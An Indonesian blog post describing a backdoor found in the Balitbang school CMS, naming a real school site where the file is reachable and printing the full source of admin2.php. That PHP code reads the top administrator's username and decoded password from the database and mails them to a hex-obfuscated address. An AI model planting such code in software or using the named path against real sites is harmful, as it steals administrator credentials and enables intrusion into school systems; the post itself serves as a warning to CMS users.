Backdoor di CMS Balitbang

By: Unknown on 02.00

        Lagi tahap perkenalan sama Elol404, dia ngasih tau kalau ada bug di CMS balitbang, menurut mastah-mastah yang lain ada di folder functions dan nama filenya admin2.php, katanya itu di encreypt sebanyak 7x, saya juga belum nyoba,
tapi saat saya mencari bugnya saya nyari sekolah-sekolah yg deket daerah rumah saya, biar dia mau beli CMS saya. wkwkwkwk
dapetlah SMK MADYA DEPOK link : www.smkmadya-depok.com/functions/admin2.php
dan sewaktu di buka tulisanya hanya "Pesan terkirim".
baru saya pengen jualan ehh,, udah ada yang memberi peringatan wkwkw.. gak jadi deh..,
peringatan dari WeNNeX --
haduh.. wkwkw .. ya sabar saja lah..
sewaktu saya buka source php file admin2.php  isi file sebagai berikut :
<?php include "koneksi.php"; include "fungsi_pass.php"; $data = "<table border=1 >"; $query="select userid, count(menu) as jum from user_level group by userid order by jum desc "; $alan=mysql_query($query) or die ("query gagal"); if($row=mysql_fetch_array($alan)) { $query2="select *from user where userid='$row[userid]' "; $alan2=mysql_query($query2) or die ("query gagal"); $r=mysql_fetch_array($alan2); $data .="top admin : $r[username] ----- Password : ".unhex($r[password],82)." <br>"; } $data .= "</table> "; $email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82); $headers = "From: \"Komunitas $nmsekolah\" <$webmail>\r\n"; $headers .= "Content-type: text/html\r\n"; mail($email, "Komunitas $nmsekolah :: Pesan baru ::", $data, $headers); echo "Pesan terkirim"; ?>
saya pahamin lagi itu ternyata, nanti data-datanya terkirim ke ....>>>> E-mail yg buat CMSnya,, wkwk

saran saya : lain kali kalau memakai CMS orang, harus di pahami di mana celah CMSnya :D